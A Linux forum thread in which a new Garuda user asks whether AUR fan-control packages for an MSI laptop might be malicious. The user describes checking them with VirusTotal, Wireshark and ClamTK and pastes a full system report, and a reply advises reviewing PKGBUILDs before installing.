AUR viruses?

Hi Everyone,
Relatively new Linux user here - defiantly new in terms of using Linux as my daily driver (though dual boot as i need some Windows software).

The age old story
Boy meets AUR
AUR tempts boy
Boy installs software from AUR
Boy gets worried what he may of caught something from AUR.

My laptop is pretty old and one of the fans is on the way out and cannot be found. I have tried various solutions to view and control fans on this MSI laptop but non worked. I then came across

MControlCentre - downloaded latest version 4 from the GitHub page (GitHub - dmitry-s93/MControlCenter: An application that allows you to change the settings of MSI laptops running Linux) and installed following nistructions on GitHub.

ISW / Ice-Sealed Wyvern (installed from AUR both the isw and the isw-git version)

msi-ec-git 1-1 - GitHub - BeardOverflow/msi-ec

I then became aware that AUR can be danerous if you dont know what you are doing and I clearly didnt.

What I then did.
Uninstalled isw
uninstalled MControlCentre

Ran Snapper Tools and rolled back to before I installed those things.

MControlCentre - As I had downloaded MControlCentre I ran the individual files trough VirusTotal and looked at behaviour analysis and no IP connections were made. I therefore assume this is safe to use?

isw - couldnt access any download fort this so couldnt run it through VirusTotal

Open Freeze Center v3.2.1 - I downloaded this and ran it through VirusTotal and whilst clean in the behavioural sandbox it was connecting to a load of different IP addresses. (however I had got a little wiser by this point and hadnt installed it - only extracted it from its archive.

Using Wireshark I couldnt see any IPs being connected too that Open Freeze Center had connected to in the sandbox (other then 2 which are also present on my win10 install so i assume required).

I updated and ran ClamTK on my home folder and then on my root folders as well, including those I had to access as root. I had a load of PuPs and detections related to my windows games installed under Lutris but thats all.

My questions:
Does anyone have experience of any of the software above I have mentioned and would they be able to comment if safe?

Is there a way of identifying if my system is infected or should I be happy with Clams results?

Thanks for getting this far and your responses...

Kernel: 6.2.2-zen1-1-zen arch: x86_64 bits: 64 compiler: gcc v: 12.2.1
parameters: BOOT_IMAGE=/@/boot/vmlinuz-linux-zen
root=UUID=a0f6233f-dfa0-43e2-824a-c73b38da9d9b rw [email protected]
quiet quiet splash rd.udev.log_priority=3 vt.global_cursor_default=0
loglevel=3 ibt=off
Desktop: KDE Plasma v: 5.27.2 tk: Qt v: 5.15.8 wm: kwin_x11 dm: SDDM
Distro: Garuda Linux base: Arch Linux
Type: Laptop System: Micro-Star product: GE62 6QF v: REV:1.0
serial: <filter> Chassis: type: 10 serial: N/A
Mobo: Micro-Star model: MS-16J4 v: REV:0.A serial: <filter>
UEFI: American Megatrends v: E16J4IMS.117 date: 01/18/2018
ID-1: BAT1 charge: 39.0 Wh (97.5%) condition: 40.0/53.4 Wh (74.8%)
volts: 12.2 min: 10.9 model: MSI BIF0_9 type: Li-ion serial: N/A
status: not charging
Info: model: Intel Core i7-6700HQ socket: U3E1 bits: 64 type: MT MCP
arch: Skylake-S gen: core 6 level: v3 note: check built: 2015
process: Intel 14nm family: 6 model-id: 0x5E (94) stepping: 3
microcode: 0xF0
Topology: cpus: 1x cores: 4 tpc: 2 threads: 8 smt: enabled cache:
L1: 256 KiB desc: d-4x32 KiB; i-4x32 KiB L2: 1024 KiB desc: 4x256 KiB
L3: 6 MiB desc: 1x6 MiB
Speed (MHz): avg: 2799 high: 2801 min/max: 800/3500 base/boost: 3100/8300
scaling: driver: intel_pstate governor: powersave volts: 1.2 V
ext-clock: 100 MHz cores: 1: 2800 2: 2800 3: 2800 4: 2800 5: 2801 6: 2800
7: 2797 8: 2798 bogomips: 41599
Flags: avx avx2 ht lm nx pae sse sse2 sse3 sse4_1 sse4_2 ssse3 vmx
Vulnerabilities: <filter>
Device-1: Intel HD Graphics 530 vendor: Micro-Star MSI driver: i915
v: kernel arch: Gen-9 process: Intel 14n built: 2015-16 ports:
active: HDMI-A-1,HDMI-A-2 off: eDP-1 empty: DP-1 bus-ID: 00:02.0
chip-ID: 8086:191b class-ID: 0300
Device-2: NVIDIA GM204M [GeForce GTX 960 OEM / 970M]
vendor: Micro-Star MSI driver: nvidia v: 525.89.02
alternate: nouveau,nvidia_drm non-free: 525.xx+
status: current (as of 2023-02) arch: Maxwell code: GMxxx
process: TSMC 28nm built: 2014-19 pcie: gen: 3 speed: 8 GT/s lanes: 16
bus-ID: 01:00.0 chip-ID: 10de:13d8 class-ID: 0302
Display: x11 server: X.Org v: 21.1.7 with: Xwayland v: 22.1.8
compositor: kwin_x11 driver: X: loaded: modesetting,nvidia dri: iris
gpu: i915 display-ID: :0 screens: 1
Screen-1: 0 s-res: 3840x1080 s-dpi: 75 s-size: 1301x366mm (51.22x14.41")
s-diag: 1352mm (53.21")
Monitor-1: HDMI-A-1 mapped: HDMI-1-1 pos: primary,left model: Asus VE278
serial: <filter> built: 2014 res: 1920x1080 hz: 60 dpi: 82 gamma: 1.2
size: 598x336mm (23.54x13.23") diag: 686mm (27") ratio: 16:9 modes:
max: 1920x1080 min: 720x400
Monitor-2: HDMI-A-2 mapped: HDMI-1-2 pos: right model: Asus VE278
serial: <filter> built: 2014 res: 1920x1080 hz: 60 dpi: 82 gamma: 1.2
size: 598x336mm (23.54x13.23") diag: 686mm (27") ratio: 16:9 modes:
max: 1920x1080 min: 720x400
Monitor-3: eDP-1 mapped: eDP-1-1 note: disabled model: LG Display 0x046f
built: 2014 res: 1920x1080 dpi: 142 gamma: 1.2 size: 344x194mm (13.54x7.64")
diag: 395mm (15.5") ratio: 16:9 modes: 1920x1080
API: OpenGL v: 4.6.0 NVIDIA 525.89.02 renderer: NVIDIA GeForce GTX
970M/PCIe/SSE2 direct-render: Yes
Device-1: Intel 100 Series/C230 Series Family HD Audio
vendor: Micro-Star MSI driver: snd_hda_intel bus-ID: 2-4:2 v: kernel
chip-ID: 1235:8202 alternate: snd_soc_avs class-ID: 0102 bus-ID: 00:1f.3
chip-ID: 8086:a170 class-ID: 0403
Device-2: Focusrite-Novation Focusrite Scarlett 2i2 2nd Gen type: USB
driver: snd-usb-audio
Sound API: ALSA v: k6.2.2-zen1-1-zen running: yes
Sound Interface: sndio v: N/A running: no
Sound Server-1: PulseAudio v: 16.1 running: no
Sound Server-2: PipeWire v: 0.3.66 running: yes
Device-1: Intel Wireless 3165 driver: iwlwifi v: kernel pcie: gen: 1
speed: 2.5 GT/s lanes: 1 bus-ID: 02:00.0 chip-ID: 8086:3165 class-ID: 0280
IF: wlp2s0 state: down mac: <filter>
Device-2: Qualcomm Atheros Killer E2400 Gigabit Ethernet
vendor: Micro-Star MSI driver: alx v: kernel pcie: gen: 1 speed: 2.5 GT/s
lanes: 1 port: d000 bus-ID: 03:00.0 chip-ID: 1969:e0a1 class-ID: 0200
IF: enp3s0 state: up speed: 1000 Mbps duplex: full mac: <filter>
IF-ID-1: anbox0 state: down mac: <filter>
Device-1: Intel Bluetooth wireless interface type: USB driver: btusb v: 0.8
bus-ID: 2-10:5 chip-ID: 8087:0a2a class-ID: e001
Report: bt-adapter note: tool can't run ID: hci0 rfk-id: 1 state: down
bt-service: disabled rfk-block: hardware: no software: no address: N/A
Local Storage: total: 2.75 TiB used: 1.5 TiB (54.5%)
ID-1: /dev/nvme0n1 maj-min: 259:0 vendor: Sabrent model: N/A
size: 953.87 GiB block-size: physical: 512 B logical: 512 B speed: 31.6 Gb/s
lanes: 4 type: SSD serial: <filter> rev: RKT303.3 temp: 31.9 C scheme: GPT
SMART: yes health: PASSED on: 260d 17h cycles: 3,347
read-units: 72,987,805 [37.3 TB] written-units: 61,169,151 [31.3 TB]
ID-2: /dev/sda maj-min: 8:0 vendor: Crucial model: CT2000MX500SSD1
family: Micron Client SSDs size: 1.82 TiB block-size: physical: 4096 B
logical: 512 B sata: 3.3 speed: 6.0 Gb/s type: SSD serial: <filter>
rev: 033 temp: 42 C scheme: GPT
SMART: yes state: enabled health: PASSED on: 158d 23h cycles: 2237
written: 20.28 TiB
ID-1: / raw-size: 934.98 GiB size: 934.98 GiB (100.00%)
used: 373.28 GiB (39.9%) fs: btrfs block-size: 4096 B dev: /dev/sda2
maj-min: 8:2
ID-2: /boot/efi raw-size: 512 MiB size: 511 MiB (99.80%)
used: 7.9 MiB (1.5%) fs: vfat block-size: 512 B dev: /dev/sda1 maj-min: 8:1
ID-3: /home raw-size: 934.98 GiB size: 934.98 GiB (100.00%)
used: 373.28 GiB (39.9%) fs: btrfs block-size: 4096 B dev: /dev/sda2
maj-min: 8:2
ID-4: /var/log raw-size: 934.98 GiB size: 934.98 GiB (100.00%)
used: 373.28 GiB (39.9%) fs: btrfs block-size: 4096 B dev: /dev/sda2
maj-min: 8:2
ID-5: /var/tmp raw-size: 934.98 GiB size: 934.98 GiB (100.00%)
used: 373.28 GiB (39.9%) fs: btrfs block-size: 4096 B dev: /dev/sda2
maj-min: 8:2
Kernel: swappiness: 133 (default 60) cache-pressure: 100 (default)
ID-1: swap-1 type: zram size: 15.5 GiB used: 109 MiB (0.7%) priority: 100
dev: /dev/zram0
System Temperatures: cpu: 63.0 C pch: 68.5 C mobo: N/A gpu: nvidia
temp: 61 C
Fan Speeds (RPM): N/A
Processes: 337 Uptime: 42m wakeups: 2 Memory: 15.5 GiB
used: 6.01 GiB (38.8%) Init: systemd v: 253 default: graphical
tool: systemctl Compilers: gcc: 12.2.1 Packages: pm: pacman pkgs: 2136
libs: 578 tools: gnome-software,octopi,pamac,paru Shell: garuda-inxi (sudo)
default: Bash v: 5.1.16 running-in: konsole inxi: 3.3.25
Garuda (2.6.15-1):
System install date:     2023-02-18
Last full system update: 2023-03-11 ↻
Is partially upgraded:   No
Relevant software:       snapper NetworkManager mkinitcpio nvidia-dkms
Windows dual boot:       Yes
Failed units:            anbox-container-manager.service systemd-networkd-wait-online.service

It's good to be cautious with AUR packages. How far you should take it is really up to you, and depends on what you perceive your threat model to be.

Reviewing the PKGBUILD before installing an AUR package is your best bet for staying safe with this resource. This is from another forum but I think it is well-stated advice and worth a read: AUR PKGBUILDs - #18 by Kresimir - Newbie - EndeavourOS

Again, this is up to you but I would say yes. If anything, ClamAV is known for being overly aggressive with flagging threats; many people report getting more false positives than actual threats.


Hey there, thanks for your reply and putting my mind at rest.